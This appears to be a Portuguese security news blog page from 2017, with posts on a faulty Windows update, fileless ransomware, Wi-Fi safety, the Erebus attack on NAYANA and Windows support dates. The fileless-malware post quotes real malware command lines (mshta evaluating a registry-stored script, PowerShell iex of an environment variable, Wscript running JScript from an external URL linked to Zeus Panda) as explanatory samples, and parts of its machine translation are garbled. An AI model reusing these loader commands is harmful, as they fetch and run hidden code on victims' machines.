Tocando Agora

Bem Vindo

Bem vindo ao nosso blog, aonde discutimos vários tópicos do dia-a-dia, e um parcial de nossa rádio web (www.computersservice.radio.br)

domingo, 15 de outubro de 2017

Atualização do Windows causa 'tela azul da morte'; entenda o problema






Uma atualização recente do Windows liberada nesta semana pela Microsoft causou problemas em alguns computadores. Um pacote de correções problemático fez com que alguns computadores ficassem impedidos de ligar e apresentassem a famigerada “tela azul da morte”.

O problema veio com a “Patch Tuesday”, a segunda terça-feira do mês, quando a Microsoft distribui suas correções mensais de bugs e pacotes de segurança. No entanto, após a publicação, os fóruns da empresa começaram a receber várias reclamações de usuários do Windows em PCs de diversas fabricantes e até mesmo em computadores montados de forma independente.

A Microsoft atribui o problema a um erro de publicação, atingindo principalmente os clientes corporativos. O problema da “tela azul da morte” atingiu computadores com Windows 10 versão 1703, Windows 10 versão 1607 e Windows Server 2016 atrás do WSUS (Windows Server Update Services). Um representante da empresa nos fóruns afirmou que a Microsoft publicou acidentalmente os updates delta pelo canal WSUS, e os computadores que pegaram os dois acabaram com problemas. Usuários que receberam a atualização pelo Windows Update normalmente não são afetados.

A empresa diz que o problema já foi corrigido e validado, mas existem três cenários em que máquinas ainda podem estar afetadas pela falha:
  1. Os Administradores do WSUS/SCCM que sincronizaram a atualização de 10 de outubro (KB4041676 ou KB4041691) antes das 16h PDT em 10 de outubro ainda podem ter esses KBs armazenados em cache.
  2. Dispositivos gerenciados WSUS/SCCM que baixaram a atualização KB4041676 ou KB4041691 de 10 de outubro com problemas de publicação e têm dispositivos em um estado de reinicialização pendente.
  3. Dispositivos gerenciados WSUS/SCCM que instalaram a atualização KB4041676 ou KB4041691 de 10 de outubro e não conseguem ser inicializados e/ou podem exibir uma tela de recuperação.
O primeiro problema é mais simples, bastando apenas escanear novamente atrás de atualizações. Os cenários 2 e 3 são mais complexos e requerem uma série de ações para retomar a operação da máquina. Para receber instruções detalhadas sobre como agir nestes casos, vale a pena olhar o site de suporte da Microsoft. (https://support.microsoft.com/pt-br/help/4049094/windows-devices-may-fail-to-boot-after-installing-october-10-version-o)

sábado, 15 de julho de 2017


Infecções sem arquivo - o último truque de Ransomware


Se alguém pensou que o susto do Ransomware WannaCry de maio de 2017 era ruim, é apenas o começo. Todos os anos, à medida que são pagos mais resgates, os cibercriminosos têm mais capital para investir em novas tecnologias e técnicas. Uma de suas técnicas mais promissoras é infecções sem arquivo ou ataques de script.

Historicamente, o malware e agora o ransomware furtivamente um programa em um computador, e então, abertamente ou secretamente, tentaram a execução desse arquivo. O tópico comum nesses ataques é que um arquivo é baixado e, em seguida, tenta executar. A arquitetura do software antivírus emprega um driver de sistema de arquivos. Esse driver trava o arquivo e depois determina se ele pode ser executado.

Um malware sem arquivo não descarta um arquivo e ignora o driver do sistema de arquivos do AV mainstream. Em vez disso, os scripts são escritos e executados através de conhecidos mecanismos de script, como Powershell, MSHTA, Cscript e Wscript. Mostre e diga a hora.

C: \ WINDOWS \ system32 \ mshta.exe "javascript: QNm90c =" 8YNUG ";
S07R = novo ActiveXObject ("WScript.Shell"); E91eHqEE = "l"; L21MJb = S07R.RegRead ("HKCU \\ software \\ lfxqiypm \\ qkkqsiqrqk"); G0dn1w = "jSJKZ"; Eval (l21MJb); GQEXz2t = "apyD"; "
 
O comando acima invoca o MSHTA, que é um conhecido bem conhecido aplicativo Microsoft. O comando chama Javascipt, que por sua vez chama Wscript para executar um script a partir de uma chave de registro com caracteres aleatórios. Uma vez que o script reside em uma chave de registro, não há nenhum arquivo para o driver do sistema de arquivos para analisar.
 
"C: \ WINDOWS \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe" iex $ env: kuihcdc

O comando acima instrui o Powershell, outro mecanismo de script Microsoft válido, para executar um script a partir de uma variável de ambiente com caracteres aleatórios. Uma vez que o script reside em uma variável de ambiente em vez de um arquivo, o driver do sistema de arquivos tem visibilidade zero neste tipo de atividade.

Wscript // B // E: JScript OTTYUADAF "gexywoaxor" "http://hit.thincoachmd.com/?oq=hpKckf7tVaATgjxCHeAFpyI4PUA8X_qyqiEnVmhDP
g5_U_kDbMAl19pucJOw6mF4&es_sm=140&

O comando acima executa o Wscript, outro mecanismo de script Microsoft válido e, em seguida, muda para o Javascript e executa o script diretamente de um site com uma seqüência de consulta gnarly. Vamos pensar sobre isso. O comando acima está instruindo wscript a executar o código diretamente de um site externo sem um arquivo atingindo o driver do sistema de arquivos.
 
Se alguém faz uma pesquisa na estranha string "gexywoaxor", descobre-se que esse malware é um trojan bancário chamado Zeus Panda descoberto por Forcepoint.

O artigo está datado de julho de 2016 e o ​​PC Matic bloqueou a amostra em novembro de 2016, 4 meses depois.


Amostra de ponto de força
Amostra PC Matic
Encontro
Julho de 2016
Novembro de 2016
Mecanismo de script
Wscript
Wscript
Nome do arquivo de script
R3ak.tmp
OTTYUADAF
Chave de criptografia
Gexwoaxor
Gexwoaxor
URL
Ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh
Hit.thincoachmd.com
 
Nesses quatro meses, houve mudanças visíveis no método de ataque, no entanto, a chave de criptografia crítica "gexywoaxor" permaneceu inalterada. O fato de que uma nova chave de criptografia não era necessária era um sinal de que este vírus tinha sucesso na entrega da sua carga útil.

Os ataques de script ou infecções sem arquivo estão aqui hoje. 25% de todos os blocos de PC Matic de malware estão no nível de script. De forma justa, no ambiente de hoje, com freqüência, um ataque de script envolve o lançamento de um arquivo mais tarde para ser executado. Nesse caso, há um segundo ponto em que uma abordagem de placa de arquivos / lista negra pode capturar e bloquear a intrusão. O problema é que nem todos os ataques de script soltam um arquivo e isso representa um buraco de segurança no antivírus da sua empresa.

sexta-feira, 14 de julho de 2017

Segurança Wi-Fi quando viajando - Dicas e precauções a serem tomadas

 
A segurança cibernética não é apenas proteger seu PC e dispositivos móveis dos ataques de Trojans e Malware; É mais sobre a segurança de suas redes. Você precisa proteger todas as partes da sua rede. Um Wi-Fi público gratuito e aberto geralmente traz um sorriso no rosto de todos, mas o fato é que essas redes abertas de Wi-Fi públicas são altamente propensas a ataques cibernéticos, especialmente quando você está viajando. Existem vários perigos de usar um ponto de acesso Wi-Fi público . Nesta publicação, aprenderemos sobre a segurança Wi-Fi e algumas dicas e precauções a serem tomadas para acessar de forma segura a Internet ao viajar. Essas maneiras simples protegerão sua rede dos ataques Wi-Fi em qualquer lugar.


Para evitar esses ataques, primeiro você precisa saber de que tipo de ataques sua rede Wi-Fi é propensa. Alguns dos ataques mais difíceis e prejudiciais incluem Sniffing, Sidejacking e Engenharia Social.

1 - Sniffing , que é um ataque passivo, baseia-se basicamente em um software sniffer que rouba os dados que passam por uma rede de informática. Enquanto os sniffers de pacotes são realmente projetados para hackers éticos, solução de problemas e análise de dados, os cibercriminosos o usam para intrusar em sua rede e roubar os dados. Alguns ataques de sniffing típicos incluem: sniff de LAN, sniff de protocolo, ARP sniff e sniffing de senha da Web. Os hackers podem roubar suas senhas sobre Wi-Fi usando esta técnica!

2 - Sidejacking , também conhecido como seqüestro de sessão é um tipo de ataque Wi-Fi onde os atacantes usam seus cookies para representar sua conta e entrar em qualquer site. Enquanto os sites codificam seu processo de login, eles nunca criptografam seus cookies tornando sua conta vulnerável. Uma rede Wi-Fi aberta compartilha os cookies da sessão através do ar, o que torna sua rede ainda mais vulnerável e propensa a atacar.

3 - A engenharia social é um tipo de ataque onde os atacantes enganam os usuários para quebrar seus sistemas de segurança regulares. É mais como enganar os usuários. Os ataques de engenharia social de uso comum incluem: clique em iscas, phishing , scareware e pretexto.

Agora, quando você está ciente desses ataques comuns de Wi-Fi, vamos falar sobre algumas dicas e precauções a serem tomadas para acessar de forma segura a Internet ao viajar.

Segurança Wi-Fi quando viajando

Mantenha o seu WiFi desligado

Geralmente, todos temos o hábito de manter nosso WiFi aberto em nossos dispositivos móveis que se conecta automaticamente a uma rede WiFi pública aberta que não é segura. Mantenha o seu WiFi desligado e ligue-o apenas quando quiser usar a internet. Não é recomendado usar as conexões WiFi públicas a menos que você tenha algo realmente importante a fazer. As conexões WiFi abertas que não estão protegidas com uma senha geralmente são perigosas, pois qualquer pessoa que use o mesmo WiFi pode interferir e cortar seu dispositivo. Todos os seus detalhes de login estão no ar.

Usar VPN

Uma rede privada virtual, muitas vezes denominada VPN, é um tipo de túnel privado da sua rede, o que lhe garante a intrusão indesejada. Durante a viagem, muitas vezes usamos conexões Wi-Fi públicas para nossas transações de dinheiro on-line, que podem ser perigosas. Mas se você estiver usando uma VPN, esconderá todas as suas atividades na internet dos atacantes. É bastante fácil configurar uma VPN para dispositivos móveis, laptops e tablets. Existem vários softwares VPN gratuitos que você pode usar.

As estações de cobrança públicas não são seguras

Você já ouviu falar sobre Juice Jacking ? É uma maneira de roubar todos os dados armazenados no seu telefone através do cabo de carregamento USB. Quando você usa a porta USB de estações de carregamento público, você está realmente concedendo aos hackers para acessar todos os seus dados sem saber. É sempre melhor ter seu próprio banco de energia e não usar as estações de carregamento público para seus telefones celulares.

Configurações de compartilhamento

Antes de se conectar ao Wi-Fi público, verifique se as configurações de compartilhamento em seus dispositivos estão desligadas. Manter essas configurações, ON, leva a um roubo de dados obviamente.

Carregar um dispositivo habilitado para Ethernet

Sim, não podemos imaginar nossas vidas sem a internet, mas usar o WiFi público não é uma boa opção. Se você é viajante de negócios e precisa necessitar do acesso à internet em qualquer lugar, sugere-se transportar sua própria porta Ethernet e um dispositivo habilitado para Ethernet.

Hotspot pessoal

Embora esta seja uma opção cara, mas é a melhor para os viajantes de negócios, que precisam estar online sempre. Um ponto de acesso privado / pessoal vem em planos pré-pagos e pós-pagos. O hotspot pessoal protege sua atividade online e criptografa todos os seus detalhes. Todas as suas atividades on-line, incluindo as transações de dinheiro, são garantidas.

Wi-Fi Dicas para viajantes internacionais

Quando você está viajando internacionalmente, você realmente precisa ficar conectado com as pessoas em seu país de origem e a internet é a única saída. Assim, torna-se ainda mais importante manter o cuidado e a vigilância sobre o uso das redes WiFi públicas e tomar algumas etapas básicas para garantir-se em hotspots WiFi públicos para proteger seus dados ao usar redes sem fio não seguras.

  • Você precisa usar um software VPN, pois criptografará todos os dados que seu PC envia para que não seja hackeável.
  • Monitore sua conexão Bluetooth em locais públicos para garantir que outros não interceptem sua transferência de dados.
  • Usar as redes não criptografadas é altamente arriscado, pois todos os seus detalhes são facilmente hackeáveis.
  • Manter o WiFi desligado quando não está em uso é outra dica muito importante.
  • Além disso, é preciso evitar o download ou a instalação de atualizações nos dispositivos quando viaja internacionalmente. Isso ocorre porque os hackers costumam enganar os usuários com tais notificações de atualização para entrar no seu sistema.
É melhor se você pode usar uma conexão por cabo ou comprar um plano de dados ilimitado para o seu dispositivo e parar de usar o Wi-Fi público completamente

Ransomware sequestra 153 servidores Linux e empresa teve que pagar R$ 3 milhões para descriptografar.

 

Ransomware sequestra 153 servidos Linux e empresa teve que pagar R$ 3 milhões de resgate.

O provedor de hospedagem  web sul-coreano concordou em pagar US$ 1 milhão em bitcoins para crackers depois que um ransomware Linux infectou seus 153 servidores, criptograficando 3.400 sites de negócios e seus dados hospedados neles.

De acordo com uma publicação no blog publicada pela NAYANA, a empresa de hospedagem na web, este evento infeliz aconteceu no dia 10 de junho, quando o malware do Ransomware atingiu seus servidores de hospedagem e o atacante exigiu 550 bitcoins (mais de US$ 1,6 milhão) para desbloquear os arquivos criptografados.


No entanto, a empresa negociou mais tarde com os cibercriminosos e concordou em pagar 397,6 bitcoins (cerca de US$ 1,01 milhão) em três parcelas para que seus arquivos fossem descriptografados.

A empresa de hospedagem já pagou duas parcelas no momento da redação e pagaria a última parcela do resgate depois de recuperar dados de dois terços dos servidores infectados.

De acordo com a empresa de segurança Trend Micro, o Ransomware usado no ataque foi o Erebus que foi detectado em setembro do ano passado e foi visto em fevereiro deste ano com as capacidades de desvio de controle de conta de usuário do Windows.

Uma vez que os servidores de hospedagem estavam sendo executados no kernel do Linux 2.6.24.2, os pesquisadores acreditam que o Ransomware do Erebus Linux pode ter usado vulnerabilidades conhecidas, como SUTY VW; Ou uma aplicação local do Linux para assumir o acesso raiz do sistema.

"A versão do Apache NAYANA usada é executada como um usuário de ninguém (uid = 99), o que indica que uma exploração local também pode ter sido usada no ataque", observa o pesquisador.

"Além disso, o site da NAYANA usa o Apache versão 1.3.36 e PHP versão 5.1.4, ambos lançados em 2006."

Erebus, o ransomware que visa principalmente usuários na Coréia do Sul, criptografa documentos de escritório, bancos de dados, arquivos e arquivos multimídia usando o algoritmo RSA-2048 e, em seguida, anexa-os com uma extensão .ecrypt antes de exibir a nota de resgate.

"O arquivo primeiro é codificado com criptografia RC4 em blocos de 500kB com chaves geradas aleatoriamente", dizem os pesquisadores. "A chave RC4 é então codificada com o algoritmo de criptografia AES, que é armazenado no arquivo. A chave AES é novamente criptografada usando o algoritmo RSA-2048 que também é armazenado no arquivo."

A chave pública que é gerada localmente é compartilhada, enquanto a chave privada é criptografada usando criptografia AES e outra chave gerada aleatoriamente.

De acordo com a análise realizada pelos pesquisadores da Trend Micro, a descriptografia de arquivos infectados não é possível sem se apoderar das chaves RSA.

Então, a única maneira segura de lidar com ataques de resgate é a prevenção. Como recomendamos anteriormente, a melhor defesa contra o Ransomware é criar conscientização dentro das organizações, bem como para manter backups que são rodados regularmente.

A maioria dos vírus é introduzida abrindo anexos infectados ou clicando em links para malwares geralmente em e-mails de spam. Portanto, NÃO CLIQUE em links fornecidos em e-mails e anexos de fontes desconhecidas.

Além disso, assegure-se de que seus sistemas estejam executando a versão mais recente dos aplicativos instalados.


Fonte: The Hacker News

quinta-feira, 25 de maio de 2017

Descubra Quando a Sua Versão do Windows Deixará de Receber Suporte

O recente ataque do ransomware WannaCry demonstra a importância das atualizações automáticas de segurança dos computadores. Não importa o quanto você seja cuidadoso, o malware pode explorar uma brecha na rede e obter controle do seu sistema a menos que você instale patches de segurança.

Porém, a Microsoft não oferece as atualizações de segurança para todos as versões do sistema operacional Windows para o resto da vida. Além disso, às vezes, a empresa deixa de oferecer o suporte mainstream, mas disponibiliza o estendido.

Conforme publicou o How-To Geek, a diferença entre um e outro é que ao lançar uma versão do Windows pela primeira vez, a companhia oferece o suporte mainstream por cinco anos, com direito às atualizações de segurança e suporte gratuito da equipe da Microsoft. Já o estendido, que também dura cinco anos, só dá direito às atualizações, enquanto o suporte é pago.

Depois desse período de 10 anos, o sistema operacional deixa de receber os patches de segurança. A Microsoft até chega a abrir algumas exceções para empresas que ainda utilizam as versões antigas, mas raras são as vezes que as atualizações de segurança chegam para o público em geral depois que expira o prazo do suporte.

No caso do WanaCry, a companhia liberou uma atualização geral para Windows XP, Windows 8 e Windows Server 2003, que já não são suportados oficialmente, por ser tratar de uma brecha de segurança grave.

A Microsoft sempre define as datas exatas que deixará de oferecer o suporte à uma versão, que podem ser conferidas (https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet). Veja quando termina o suporte da Microsoft para o Windows 7, 8 e 10:

O Windows 7 é compatível com atualizações de segurança até o dia 14 de janeiro de 2020. No entanto, o usuário precisa ter o Service Pack 1 instalado para obter as demais atualizações.

O Windows 8.1 é compatível com as atualizações de segurança até o dia 10 de janeiro de 2023.

O Windows 10 é suportado até o dia 14 de outubro de 2025. Você deve ter a versão mais recente instalada para continuar recebendo as atualizações.

A empresa poderia estender essas datas se quiser, mas nunca encerrar o suporte antes.

segunda-feira, 22 de maio de 2017

Pesquisadores acreditam que ataque maior que o WannaCry poderá acontecer

Malware, por ser silencioso, pode ter feito ainda mais vítimas no mundo.

O ataque virtual que aconteceu na última semana ainda está rendendo alguns prejuízos em várias partes do mundo. De acordo com especialistas em segurança, a brecha usada no ataque também já foi utilizada em uma edição anterior, que pode ter vitimado mais máquinas e também usuários do que o atual. Até então, os números somam 200 mil computadores comprometidos no mundo todo.

O ataque anterior foi chamado de Adylkuzz, e utiliza a mesma arma EternalBlue desenvolvida pela NSA e vazada pelo grupo Shadow Brokers. A diferença é método usado: Ao invés de travar o computador e pedir resgate para liberá-lo, o malware instala um software para mineração da criptomoeda Monero, semelhante à Bitcoin, porém, que promete o anonimato de todas as transações.


De acordo com o especialista de segurança Proofpoint, o ataque teve início entre 24 de abril e 2 de maio, agindo de modo mais silencioso.

O modo de agir do Adylkuzz é muito direto, através da brecha EternalBlue, os computadores acabam infectados com um sistema chamado DoublePulsar, que acaba abrindo uma porta dos fundos para a instalação do AdyKuzz.

"As estatísticas iniciais sugerem que esse ataque pode ser em maior escala que o WannaCry, afetando centenas de milhares de computadores e servidores ao redor do mundo", informa a empresa

Diferentemente do WannaCry, não há nenhuma tela informativa sobre um computador infectado. Os sintomas são a perda de acesso a recursos de rede e também lentidão no computador. Sendo assim, por ser mais discreto, ele pode ter feito mais vítimas, o que o deixa impressionante e perigoso.

Para prevenção do Adylkuzz a prevenção é a mesma, ou seja, atualização do Windows.